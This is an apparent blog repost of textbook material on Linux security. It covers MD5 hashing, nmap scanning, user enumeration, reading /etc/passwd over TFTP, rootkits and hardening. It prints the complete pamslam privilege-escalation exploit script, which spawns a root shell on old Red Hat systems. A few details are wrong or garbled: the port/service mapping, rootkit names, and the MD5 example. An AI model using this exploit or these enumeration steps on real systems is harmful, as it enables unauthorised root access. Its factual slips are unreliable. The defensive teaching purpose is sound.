linux security 2 Chủ nhật, Tháng 3 9 2008

[The MD5 Algorithm]

MD5, a hash algorithm, improves upon the use of DES in many ways:

Infinite length passwords They are not limited to eight characters.

Much larger keyspace Here is an example of the output of MD5:

$1$rVh4/3C/$.xtBPA85bzw/2qBTOYY/R.

It is much longer than 13 characters, and the legal characters include punctuation and other characters.

Exportable It was not developed in part by the U.S. government, so it can be exported outside the United States.

The following Perl script illustrates an implementation of MD5:

#!/usr/bin/perl –w
# md5.pl
288 Hacking Linux Exposed: Linux Security Secrets & Solutions
use strict;
use MD5;
print ‘Please enter your password: ‘;
my $passwd = <STDIN>;
chomp $passwd;
my $md5 = new MD5;
$md5->add($passwd);
my $digest = $md5->digest();
print(“Result is “, unpack(“H*”, $digest), “\n”);

Here is an example of executing this program:

[jdoe@machine1 perl]$ ./md5.pl
Please enter your password: IamGod
Result is d8c653b74da4841b95b17d38a68f20cb

System administrators should be concerned about an attacker running a password cracker on their passwords. However, that does not mean these password cracking tools are all bad. System administrators can run these tools on their machines and try to crack the passwords therein, thereby determining which passwords on the system are weak and should be changed. It is recommended that these tools be run periodically.

[Compressing, Installing, and Compiling]

In Linux, files are packaged and compressed in various ways. One of the most common compression formats is the Tape Archiving program (Tar). Tar is a standard archive and was originally developed as backup software for UNIX. It collects several files to a single file. It does-n’t do file compression; therefore, a second program is needed. A program called gzip is one of the most common file compression programs. Compiling a package from a source tarball is not always a simple procedure. After uncompressing the package, you should search for a file called README, README.INSTALL, README.CONFIGURE, or something similar. This file will usually describe the configuration and installation process. Frequently, the source package includes a script called configure, which you execute to have the package auto detect your computer’s installed libraries and configure itself appropriately. If so, the process includes three commands:

./configure

make

make install

You might want to develop programs yourself, and if so, Linux offers you that capability. Linux comes with the GNU C compiler (GCC). This capability also comes in handy when you download a C program from a security site or would like to check out a piece of exploit code. With Linux, many programs might not be complied for you. The process of compiling is not overly difficult, and a basic program and the steps required to compile it are shown here:

[root@mg /root]#.vi hello.c
#include <stdio.h>
int main(int argc, char ** argv)
{
printf(“Hello world!\n”);
return 0;
}

[root@mg /root]#. gcc -o hello hello.c
[root@mg /root]#. ./hello Hello world!

First, the program code was written; in this case, the vi editor was used. Next, it was compiled with the gcc -o command. Finally, it was run by executing it from the terminal window, ./hello. Notice the ./ in front of the command. This ensures that Linux looks in the local directory for the specified executable.

[Scanning]

Scanning finds the hosts and determines what ports and applications they might be running. Here, you can see results that will begin to differentiate Windows and Linux systems. One big clue is open ports, such as 21, 37, 79, 111, and 6000. Those represent programs, such as secure shell (SSH), time, finger, sunrpc, and X11. Port scanners and OS fingerprinting software will be the tools of the trade. As an example look at a scan run on a Linux system:

[root@mg /root]# nmap -O 192.168.13.10

Starting nmap V. 3.93 (www.insecure.org/nmap/)
Interesting ports on unix1 (192.168.13.10):
(The 1529 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
37/tcp open time
79/tcp open finger
111/tcp open sunrpc
139/tcp filtered netbios-ssn
513/tcp open login
1103/tcp open xaudio
2049/tcp open nfs
4045/tcp open lockd
6000/tcp open X11
7100/tcp open font-service
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7
32773/tcp open sometimes-rpc9
32774/tcp open sometimes-rpc11
32775/tcp open sometimes-rpc13
32776/tcp open sometimes-rpc15
32777/tcp open sometimes-rpc17
Remote operating system guess: Solaris 2.6 – 2.7
Uptime 319.638 days (since Wed May 14 19:38:19 2005)

Nmap run completed — 1 IP address (1 host up) scanned in 7 seconds

Notice that the ports shown from this scan are much different from what was seen from Windows scans earlier in the book. Ports such as 37, 79, 111, and 32771 are shown as open. You will also want to notice that Nmap has identified the OS as Solaris.

Scanning is just the beginning. After any type of Linux or UNIX system is found, it will still require further probing to determine what’s running. Although exploiting the Windows null session might be out of the question, you can still use tools, such as banner grabbing. More importantly, if you think that the target is some flavor of UNIX, you have access to some programs not found in the world of Windows. For example, Finger, rwho, rusers, and Simple Mail Transfer Protocol (SMTP) can all be used to further leverage your knowledge.

[Finger]

Finger is a program thattells you the name associated with an email address. It might also tell you whether users are currently logged on at their system or their most recent logon session and possibly other information, depending on the data that is maintained about users on that computer. Finger originated as part of BSD UNIX.

Rwho and rusers are Remote Procedure Call (RPC) services that can give information about the various users on the system. Running rpcinfo p against the system will allow an attacker to learn the status of rwho and rusers. Rusers depends on rwho daemon. It lists the users logged in to all local machines, in who format (hostname, usernames).

Another potential tool to use for enumeration is Simple Mail Transfer Protocol (SMTP). SMTP can sometimes be helpful in identifying users. Attackers gain this information by using the SMTP vrfy (verify) and expn (expand) commands. These commands can be used to guess users on the system. Simply input names, and if the user exists, you will get back an RFC822 email address with the @ sign. If the user doesn’t exist, you’ll get back a “user unknown” error message. Although a username is not enough for access, it is half of what’s needed to get into most systems.

After a system has been scanned and enumerated, the next step is to gain access. Attempts to gain access can occur remotely or locally. Remote attacks are primarily carried out through one of four methods.

Exploit a process or program.

Exploit a Transmission Control Protocol (TCP) or User Datagram Protocol (UDP) listening service.

Exploit vulnerabilities in a system that is supplying routing services and providing security between two or more networks.

Exploit the user by having him initiate some type of action such as running an email attachment or visiting a hostile website.

Regardless of what method is used, the idea is to get some type of shell of the victim’s machine. This can be as mindless as guessing usernames and passwords to more advanced backchannel attacks that rely on the victim’s system to push the shell out to the attacker. Let’s look at a simple example of exploiting a program. If the victim is found to be running TFTP, you can try to get the victim to hand over critical files.

[root@mg /root]# tftp 192.168.13.50
tftp> get /etc/passwd /root/passwdhack.txt
Received 1015 bytes in 0.0 seconds
tftp> quit
[root@mg /root]#more passwdhack.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
operator:x:11:0:operator:/root:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/home/ftp:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
john:x:500:500:John:/home/jn:/bin/bash
clement:x:501:501:Clement:/cd/:/bin/csh
betty:x:502:502:Betty:/home/bd:/bin/pop
mike:x:503:503:Mike:/home/mg:/bin/bash

Although you could get the passwd file, you might have noticed that the passwords have been shadowed. This was not a complete success; however, the attacker was able to recover a list of users on the system. It is important to specify a destination directory when using TFTP to get the remote host’s /etc/passwd file. Otherwise, you will overwrite your own /etc/passwd file.

[Privilege Escalation]

Privilege escalation can best be described as the act of leveraging a bug or vulnerability in an application or operating system to gain access to resources, which normally would have been protected from an average user. These are attacks that are usually run locally and are concerned with increasing privilege. The objective is to force an application to perform actions that are running within a higher security context than intended by the designer, and the hacker is granted full local access and control. An example of a local attack is the pamslam vulnerability found in some older versions of Linux:

# pamslam – vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@l0pht.com
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
setuid(geteuid());
system(“/bin/sh”);
}

EOF
echo -n .
echo -e auth\\trequired\\t$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
echo -n .
gcc -fPIC -o _pamslam.o -c _pamslam.c
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
chmod 755 _pamslam.so
echo -n O
rm _pamslam.c
rm _pamslam.o
echo O
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf

[Linux RootKits]

After an attacker is on a Linux system and has made himself root, he will be concerned with maintaining access and covering his tracks. One of the best ways to maintain access is with a rootkit. A rootkit contains a set of tools and replacement executables for many of the operating system’s critical components. Once installed, a rootkit can be used to hide evidence of the attacker’s presence and to give the attacker backdoor access to the system. Rootkits require root access, but in return they give the attacker complete control of the system. The attacker can come and go at will and hide his activities from the administrator. Rootkits can contain log cleaners that attempt to remove all traces of an attacker’s presence from the log files.

Rootkits can be divided into two basic types: traditional, which replace binaries, and loadable kennel modules, which corrupt the kernel. Traditionally, rootkits replaced binaries, such as ls, ifconfig, inetd, killall, login, netstat, passwd, pidof, or ps with trojaned versions. These trojaned versions have been written to hide certain processes or information from the administrators. Rootkits of this type are detectable because of the change in size of the trojaned binaries. Tools, such as MD5sum and Tripwire, can be a big help in uncovering these types of hacks.

The second type of rootkit is the loadable kernel module (LKM). A kernel rootkit is loaded as a driver or kernel extension. Because kernel rootkits corrupt the kernel, they can do basically anything, including detection by many software methods. The best way to avoid these rootkits is simply to recompile the kernel without support for LKMs. Although the use of rootkits is widespread, many administrators still don’t know much about them, so some of the most popular ones, such as Flea, T0rm, and Adorm, are discussed in the following list:

Flea Once installed, Flea hides the attacker’s actions from the administrator, making it easy for the attacker to reenter the system at a later date.

T0rm This rootkit is popular with hackers and is notable because it breaks netstat and the ps binary is 31336 bytes. Both these items can give you clues that the rootkit has been installed.

Adorm Unlike the previous two rootkits, this one doesn’t replace system binaries because it is an LKM rootkit. Adorm intercepts system calls and modifies them as required. Adorm hijacks system calls and creates a wrapper around each call and then sanitizes the output.

Two major tools can be used to audit suspected rootkit attacks:

Chkrootkit An excellent tool that can be used to search for signs of a rootkit. It has the capability to examine system binaries for modification.

Rootkit Hunter Another tool that scans file and system binaries for known and unknown rootkits.

Finding the rootkit is not the same as seeing justice done. The overwhelming majority of individuals who attack systems go unpunished. The global nature of the Internet makes it hard to track hackers and bring them to justice.

[Hardening Linux]

To prevent Linux from being hacked, it is important to harden the system and secure services. Later in the Chapter, we look at tools, such as Nessus and SAINT, that can be used to detect ways that attackers can get into your Linux systems. For now, you need to know that after those vulnerabilities are identified, they will need to be addressed. This can mean patching, removing, or hardening those services. Placing a firewall in front of critical servers is also an important step. Programs, such as ipchains and iptables, can also be used to filter and control traffic. Another easy solution is to remove programs and services if they aren’t needed. This is known as the principle of least privilege. Some of the programs and services that are considered nonessential might include

Wget A noninteractive tool for fetching data over HTTP/HTTPS and FTP.

Finger Lets you retrieve basic information about an Internet user or host.

Lynx Text-based browser that supports both HTTP/HTTPS and FTP.

Curl A wget-like tool that also supports protocols such as Telnet and gopher.

SCP Secure file transfers using the SSH protocol.

FTP The command-line FTP client.

Telnet The Linux command-line Telnet client.

TFTP Trivial FTP.

Ping Can also be used as a rather blunt DoS tool.

Turning off unneeded services, removing unnecessary programs, and applying the latest security patches is known as hardening a system.

Chroot basically puts a program in a sandbox. The term sandbox refers to the concept of limiting the activity of a program and applying boundaries. More accurately, it redefines the root directory or / for a program or login session. Everything outside the directory you define that chroot can use doesn’t exist as far a program is concerned. It effectively jails a process into one part of the file system from which the process cannot escape. Because of this lockdown, it is important to remember that any files a chrooted program needs for proper functionality must be present inside the jail. Chroot is commonly used by programs such as FTP, BIND, mail, and Apache.

TCP Wrapper is another tool that can be used to harden Linux. Wietse Venema developed the TCP Wrapper program to protect computers from hacking attacks. For many years, this was one of the default methods used to harden Linux. It’s now being replaced by xinetd.d, which is considered more granular. Network services such as Finger, FTP, Rlogin, Telnet, and TFTP can be configured for TCP Wrapper use. More information about TCP Wrapper follows:

TCP Wrapper allows you to specify which hosts are allowed access.

TCP Wrapper is activated by having inetd call the TCP Wrapper daemon.

TCP Wrapper can be used with TCP or UDP.

Two files are used to verify access host.allow and host.deny.

The TCP Wrapper service works by inserting itself between the service and the outside world. You use two files for the management of access control:

hosts.allow Lists all hosts with connectivity to the system that can connect to a specific service.

hosts.deny Works in the same fashion as most ACLs because if it is not expressly permitted, access is then denied.

Tripwire is another valuable tool that can be used to secure Linux systems. Tripwire is the most commonly used file integrity program. It performs integrity checking by using cryptographic checksums. Tripwire can help you identify if any file tampering has occurred. It is commonly used with IDS systems because it can be used to maintain a snapshot of the system while in a known good state. If rootkits or other changes are made, Tripwire can detect it. Tripwire performs its magic by creating a one-way hash value for files and directories. This hash is stored, and then periodically new scans are performed. The new scanned value is compared against the stored ones. If the two values do not match, a flag is set and an administrator must take action. The Tripwire policy file is twpol.txt and can be found in the /etc/tripwire directory.

[Logging]

Although logging will not prevent an attack, it is a useful tool for determining what happened. Linux will allow you to log systems, applications, and protocols. The output of most logs are kept in the /var/log directory. If you are curious about who has logged in to the system, you can use the lastlog file. The /var/log/lastlog file tracks the last login of user accounts into the system.

Linux is gaining popularity and is fast becoming a stable industry strength OS. Once the IP address of a target system is known, an attacker can begin port scanning, looking for holes in the system for gaining access. Nmap being a popular tool. Password cracking tools are available for Linux as well. Sniffers as well as Packet assembly/analyzing tools for Linux provide attackers with the edge that they have dealing with other OSs. Attackers with root privileges can engage in session hijacking as well. Trojans, backdoors, worms are also prevalent in the Linux environment.
As with any other system, a well developed integrated procedure is to be put in place to counter the threats that exist.